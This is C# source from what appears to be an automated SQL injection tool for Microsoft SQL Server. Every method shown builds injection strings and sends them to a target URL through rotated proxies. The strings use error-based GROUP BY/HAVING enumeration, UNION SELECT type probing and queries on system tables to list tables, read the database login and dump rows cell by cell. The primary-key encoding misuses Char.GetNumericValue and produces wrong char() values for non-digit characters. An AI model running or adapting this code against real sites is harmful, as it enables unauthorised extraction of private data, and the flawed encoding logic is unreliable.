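        /// <summary>
        /// Determines a data type for every entry in <c>_QueryStructure</c>: for each
        /// column one request is issued (the column's <c>FullName</c> and
        /// <c>TableName</c> are spliced into the vector stored under
        /// <c>_AttackParams[_VectorName]</c>) and the type reported by
        /// <c>ParsePage.ParseUnionSumError</c> is written back into the list.
        /// </summary>
        /// <remarks>
        /// Progress and the raw vector are echoed via <c>UserStatus</c> (the "hmm:" line
        /// is a debug trace). The element is copied out, mutated and re-assigned, which is
        /// only required if <c>GlobalDS.Field</c> is a value type — confirm against GlobalDS.
        /// </remarks>
        private void TypeCastAttackVector()
        {
            int columnCount = _QueryStructure.Count;

            for (int FieldCounter = 0; FieldCounter < columnCount; FieldCounter++)
            {
                UserStatus(String.Format("Counter is at {0} of {1}", FieldCounter, columnCount));

                GlobalDS.Field column = (GlobalDS.Field)_QueryStructure[FieldCounter];

                // One builder per column; nothing is carried over between iterations.
                StringBuilder vector = new StringBuilder();
                vector.Append(_VectorBuffer).Append(" UNION SELECT SUM(");
                vector.Append(column.FullName);
                vector.Append(") FROM ");
                vector.Append(column.TableName);
                vector.Append("--");

                string vectorText = vector.ToString();
                _AttackParams[_VectorName] = vectorText;

                UserStatus(String.Format("hmm: {0}", vectorText));
                string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);

                column.DataType = ParsePage.ParseUnionSumError(ResultPage, _Plugin);

                // ## DEBUG
                UserStatus(String.Format("Resulting Data: {0} - {1}", column.FullName, column.DataType));
                _QueryStructure[FieldCounter] = column;
            }

            UserStatus("Finished Typecasting..");
        }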
        /// <summary>
        /// Reads the name, SQL data type and <c>IsPrimary</c> flag of the column that follows
        /// <paramref name="FieldID"/> in table <paramref name="TableID"/>, using two
        /// requests against <c>syscolumns</c> and <c>sysconstraints</c>.
        /// </summary>
        /// <param name="TableID">Object id of the table (matched against <c>id</c>).</param>
        /// <param name="FieldID">Column id; the name/type lookup uses <c>colid &gt; FieldID</c>, the status lookup uses <c>colid = FieldID</c>.</param>
        /// <returns>A <c>GlobalDS.Field</c> with <c>FieldName</c>, <c>DataType</c> and, when the second response is non-empty, <c>IsPrimary</c> (bit 0 of the parsed status).</returns>
        /// <remarks>
        /// The first response is expected as <c>name:xtype</c>; without a colon the index
        /// into the split array throws. The second response is parsed after dropping its
        /// leading character.
        /// </remarks>
        private GlobalDS.Field GetFieldData(long TableID, int FieldID)
        {
            GlobalDS.Field field = new GlobalDS.Field();

            // name:xtype of the next column (colid > FieldID)
            string columnFilter = new StringBuilder()
                .Append("id=").Append(TableID)
                .Append(" and colid > ").Append(FieldID)
                .ToString();

            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("name + char(58)+convert(char,xtype)", "syscolumns", columnFilter);

            string page = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
            string[] nameAndType = ParsePage.ParseUnionSelectForNvarchar(page, _Plugin).Split(':');

            field.FieldName = nameAndType[0];
            field.DataType  = GetSqlDataType(Convert.ToInt64(nameAndType[1].Trim()));

            // :status of the column with colid = FieldID from sysconstraints
            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58) + convert(char, status)", "sysconstraints", "id=" + TableID + " and colid=" + FieldID);
            page = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);

            string status = ParsePage.ParseUnionSelectForVarchar(page, _Plugin);

            if (status.Length > 0)
            {
                // drop the leading separator, then test bit 0 of the status value
                string statusDigits = status.Substring(1);
                field.IsPrimary = (Convert.ToInt32(statusDigits.Trim()) & 1) == 1;
            }

            return field;
        }
        /// <summary>
        /// Looks up the first entry in <c>sysobjects</c> with <c>xtype=char(85)</c> whose id is
        /// greater than <paramref name="PreviousTableID"/>, then issues a second request for
        /// that table's row count.
        /// </summary>
        /// <param name="PreviousTableID">Exclusive lower bound on the object id.</param>
        /// <returns>A <c>GlobalDS.Table</c> with <c>Name</c>, <c>ObjectID</c> and <c>RecordCount</c>;
        /// <c>RecordCount</c> is -1 when the count response is empty.</returns>
        /// <remarks>
        /// The first response is expected as <c>name:id</c>; without a colon the index into
        /// the split array throws. The table name from that response is used verbatim in the
        /// second request.
        /// </remarks>
        private GlobalDS.Table RetrieveTable(long PreviousTableID)
        {
            GlobalDS.Table table = new GlobalDS.Table();

            string objectFilter = "xtype=char(85) and id > " + PreviousTableID.ToString();
            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("convert(int, name + char(58) + convert(char, id))", "sysobjects", objectFilter);

            string page = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
            string[] nameAndId = ParsePage.ParseUnionSelectForNvarchar(page, _Plugin).Split(':');

            table.Name     = nameAndId[0];
            table.ObjectID = Convert.ToInt64(nameAndId[1]);

            // Second request: row count of the table just found.
            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("convert(int, char(58) + convert(char, count(*)))", table.Name, null);

            page = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
            string countText = ParsePage.ParseUnionSelectForVarchar(page, _Plugin);

            // An empty response means no count could be read; -1 marks that.
            table.RecordCount = countText.Length > 0
                ? Convert.ToInt64(countText.Substring(1).Trim())
                : -1;

            return table;
        }
        /// <summary>
        /// Rebuilds <c>_QueryStructure</c> from scratch: repeatedly sends the vector with a
        /// <c>GROUP BY</c> over the columns found so far plus <c>HAVING 1=1</c>, and adds the
        /// column that <c>ParsePage.ParseGroupedHaving</c> extracts from the response, until a
        /// response yields an empty <c>FieldName</c>.
        /// </summary>
        /// <remarks>
        /// Every response page is written to the console in full (debug output), and the page
        /// that ends the loop is also passed to <c>UserStatus</c>. <c>_Options.TerminateQuery</c>
        /// controls whether <c>--</c> is appended to the vector.
        /// </remarks>
        private void EnumerateAttackVector()
        {
            _QueryStructure = new List <GlobalDS.Field>();

            while (true)
            {
                StringBuilder vector = new StringBuilder();
                vector.Append(_VectorBuffer);

                // GROUP BY lists every column discovered so far, comma separated.
                if (_QueryStructure.Count > 0)
                {
                    List<string> names = new List<string>();
                    foreach (GlobalDS.Field known in _QueryStructure)
                    {
                        names.Add(" " + known.FullName);
                    }
                    vector.Append(" GROUP BY").Append(string.Join(",", names.ToArray()));
                }

                vector.Append(" HAVING 1=1");

                if (_Options.TerminateQuery)
                {
                    vector.Append("--");
                }

                _AttackParams[_VectorName] = vector.ToString();

                string page = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);

                // Debug: the whole response page goes to stdout.
                System.Console.WriteLine(page);

                GlobalDS.Field found = ParsePage.ParseGroupedHaving(page, _Plugin);

                if (found.FieldName.Length == 0)
                {
                    // No further column in this response: report the page and stop.
                    UserStatus(page);
                    break;
                }

                _QueryStructure.Add(found);
                UserStatus(String.Format("QueryStructure Size After adding: {0}", _QueryStructure.Count));
            }

            System.Console.WriteLine("Done Enumeration, I think");
        }
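        /// <summary>
        /// Refines the type of every column index that <c>FindAllVariInts</c> returns for
        /// <c>_QueryStructure</c>. For each flagged index one <c>UNION ALL SELECT</c> vector is
        /// sent in which that column and all VarChar/Char/NVarChar columns get
        /// <c>char(0x61)</c>, Text/NText/Variant columns get <c>NULL</c> and every other column
        /// gets <c>1</c>; the type returned by
        /// <c>ParsePage.ParseUnionSelectForIntegerRefinement</c> replaces the column's
        /// <c>DataType</c>.
        /// </summary>
        /// <remarks>
        /// The element is copied out, updated and re-assigned, which is only needed if
        /// <c>GlobalDS.Field</c> is a value type — confirm against GlobalDS. Progress is
        /// reported through <c>UserStatus</c>.
        /// </remarks>
        private void RefinedTypeCasting()
        {
            List <int> IntList = FindAllVariInts(_QueryStructure);

            for (int IntCounter = 0; IntCounter < IntList.Count; IntCounter++)
            {
                int targetIndex = IntList[IntCounter];
                UserStatus("Refining Integer #" + IntCounter);

                // A fresh builder per vector; nothing carries over between iterations.
                StringBuilder vector = new StringBuilder();
                vector.Append(_VectorBuffer).Append(" UNION ALL SELECT ");

                for (int FieldCounter = 0; FieldCounter < _QueryStructure.Count; FieldCounter++)
                {
                    System.Data.SqlDbType type = ((GlobalDS.Field)_QueryStructure[FieldCounter]).DataType;

                    if (FieldCounter == targetIndex ||
                        type == System.Data.SqlDbType.VarChar ||
                        type == System.Data.SqlDbType.Char ||
                        type == System.Data.SqlDbType.NVarChar)
                    {
                        //CurrentVector.Append("@@version,");
                        vector.Append("char(0x61),");
                    }
                    else if (type == System.Data.SqlDbType.Text ||
                             type == System.Data.SqlDbType.NText ||
                             type == System.Data.SqlDbType.Variant)
                    {
                        // Text, NText and Variant columns take NULL in the placeholder row.
                        vector.Append("NULL,");
                    }
                    else
                    {
                        UserStatus(String.Format("Refining {0}", type));
                        vector.Append("1,");
                    }
                }

                // drop the trailing comma
                vector.Remove(vector.Length - 1, 1);

                vector.Append(" ORDER BY 1--");

                _AttackParams[_VectorName] = vector.ToString();

                string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);

                GlobalDS.Field AdjustedField = (GlobalDS.Field)_QueryStructure[targetIndex];
                AdjustedField.DataType = ParsePage.ParseUnionSelectForIntegerRefinement(ResultPage, _Plugin);
                _QueryStructure[targetIndex] = AdjustedField;
            }

            UserStatus("Finished Refining Typecasts");
        }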
        /// <summary>
        /// Requests <c>count(name)</c> over <c>sysobjects</c> with <c>xtype=char(85)</c> and
        /// parses the number from the response.
        /// </summary>
        /// <returns>The parsed count.</returns>
        /// <remarks>
        /// The response is expected as <c>:count:</c>; the surrounding delimiters are
        /// stripped. A response shorter than two characters makes <c>Substring</c> throw and a
        /// non-numeric one makes <c>Convert.ToInt64</c> throw.
        /// </remarks>
        private long GetTableCount()
        {
            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58)+convert(char,count(name))+char(58)", "sysobjects", "xtype=char(85)");

            string page      = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
            string delimited = ParsePage.ParseUnionSelectForVarchar(page, _Plugin);

            // strip the leading and trailing delimiter, then surrounding whitespace
            string digits = delimited.Substring(1, delimited.Length - 2).Trim();

            return Convert.ToInt64(digits);
        }
        /// <summary>
        /// Pull the username the database is running as (<c>SYSTEM_USER</c>, which the query
        /// wraps in <c>char(40)</c>/<c>char(41)</c> and this method unwraps again).
        /// </summary>
        /// <returns>The database username</returns>
        /// <remarks>A parsed response shorter than two characters makes <c>Substring</c> throw.</remarks>
        public string GetDatabaseUsername()
        {
            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(40) + SYSTEM_USER + char(41)", null, null);

            string page      = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
            string bracketed = ParsePage.ParseUnionSelectForNvarchar(page, _Plugin);

            // remove brackets
            return bracketed.Substring(1, bracketed.Length - 2);
        }
        /// <summary>
        /// Fetches <c>min(KeyName)</c> from <paramref name="TableName"/>, restricted to values
        /// greater than <paramref name="CurrentPrimaryKey"/>.Value when that key has the same
        /// name, and packages the result for the next iteration.
        /// </summary>
        /// <param name="TableName">Table queried.</param>
        /// <param name="KeyName">Column used as the key; spliced verbatim into <c>min(...)</c> and into the WHERE clause.</param>
        /// <param name="CurrentPrimaryKey">Key from the previous call; its <c>Value</c> becomes the lower bound only when its <c>Name</c> equals <paramref name="KeyName"/>.</param>
        /// <param name="PrimaryKeyType">Decides how the fetched text is rewritten into <c>Value</c>.</param>
        /// <returns>
        /// A <c>GlobalDS.PrimaryKey</c> whose <c>OutputValue</c> is the fetched text with its
        /// first and last character removed, and whose <c>Value</c> is either that text trimmed
        /// or, for the character types listed in the switch, a <c>char(n) + ...</c> expression
        /// built from it.
        /// </returns>
        /// <remarks>
        /// Expects the parsed response to be at least two characters long; <c>Substring</c>
        /// throws otherwise. For character types an empty payload makes
        /// <c>StringBuilder.Remove</c> throw as well.
        /// </remarks>
        private GlobalDS.PrimaryKey IteratePrimaryKey(string TableName, string KeyName, GlobalDS.PrimaryKey CurrentPrimaryKey, SqlDbType PrimaryKeyType)
        {
            StringBuilder WhereClause = new StringBuilder();

            // Lower bound only applies when continuing on the same key column.
            if (CurrentPrimaryKey.Name == KeyName)
            {
                WhereClause.Append(KeyName).Append(" > ").Append(CurrentPrimaryKey.Value);
            }

            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58) + convert(char, min(" + KeyName + ")) + char(58)", TableName, WhereClause.ToString());

            string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
            string ResultText = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);

            // strip the leading and trailing delimiter
            ResultText = ResultText.Substring(1, ResultText.Length - 2);

            string WorkingText = "";

            switch (PrimaryKeyType)
            {
            case SqlDbType.VarChar:
            case SqlDbType.Char:
            case SqlDbType.NChar:
            case SqlDbType.NText:
            case SqlDbType.NVarChar:
            case SqlDbType.Text:
                StringBuilder ElementBuilder = new StringBuilder();

                //split
                char[] TextElements = ResultText.ToCharArray();
                for (int i = 0; i < TextElements.Length; i++)
                {
                    // Char.GetNumericValue yields the numeric value of a digit character and -1 for any other character.
                    ElementBuilder.Append("char(").Append(Char.GetNumericValue(TextElements[i])).Append(") + ");
                }
                ElementBuilder.Remove(ElementBuilder.Length - 2, 2);                       // remove trailing '+ '

                WorkingText = ElementBuilder.ToString();
                break;

            default:
                // Non-character key types are used as plain text.
                WorkingText = ResultText.Trim();
                break;
            }



            GlobalDS.PrimaryKey retVal = new GlobalDS.PrimaryKey();
            retVal.Name        = KeyName;
            retVal.Value       = WorkingText;
            retVal.OutputValue = ResultText;

            return(retVal);
        }
        // }}}

        // {{{ GetFieldData
        /// <summary>
        /// Reads one cell: the value of <paramref name="Column"/> in the row of
        /// <paramref name="TableName"/> selected by <paramref name="pk"/>.
        /// </summary>
        /// <param name="TableName">Table queried.</param>
        /// <param name="Column">Column to read; its <c>DataType</c> decides whether a select clause is built.</param>
        /// <param name="pk">Row key; when <c>Column.FieldName</c> equals <c>pk.Name</c> no request is made and <c>pk.Value</c> is returned.</param>
        /// <returns>A <see cref="DictionaryEntry"/> keyed by <c>Column.FieldName</c> holding the fetched text with its first and last character removed.</returns>
        /// <remarks>
        /// Image/Binary/VarBinary (marked TODO) and any type not listed in the switch get an
        /// empty select clause; the request is still sent. A parsed response shorter than two
        /// characters makes <c>Substring</c> throw.
        /// </remarks>
        private DictionaryEntry GetFieldData(string TableName, GlobalDS.Field Column, GlobalDS.PrimaryKey pk)
        {
            // The key column itself is already known from pk; no request needed.
            if (Column.FieldName.Equals(pk.Name))
            {
                return new DictionaryEntry(Column.FieldName, pk.Value);
            }

            string selectClause = string.Empty;

            switch (Column.DataType)
            {
            // Numeric, date/time, bit and character types are all read the same way.
            case SqlDbType.BigInt:
            case SqlDbType.SmallInt:
            case SqlDbType.TinyInt:
            case SqlDbType.Int:
            case SqlDbType.Decimal:
            case SqlDbType.DateTime:
            case SqlDbType.Money:
            case SqlDbType.Float:
            case SqlDbType.Real:
            case SqlDbType.SmallDateTime:
            case SqlDbType.SmallMoney:
            case SqlDbType.Timestamp:
            case SqlDbType.UniqueIdentifier:
            case SqlDbType.NChar:
            case SqlDbType.Char:
            case SqlDbType.NVarChar:
            case SqlDbType.Text:
            case SqlDbType.NText:
            case SqlDbType.VarChar:
            case SqlDbType.Bit:
                selectClause = "char(58) + convert(nvarchar, " + Column.FieldName + ") + char(58)";
                break;

            case SqlDbType.Image:
            case SqlDbType.Binary:
            case SqlDbType.VarBinary:
                // TODO: Figure out how to support this!
                break;
            }

            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect(selectClause, TableName, pk.Name + " = " + pk.Value);

            string page      = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
            string delimited = ParsePage.ParseUnionSelectForNvarchar(page, _Plugin);

            // strip the leading and trailing delimiter
            return new DictionaryEntry(Column.FieldName, delimited.Substring(1, delimited.Length - 2));
        }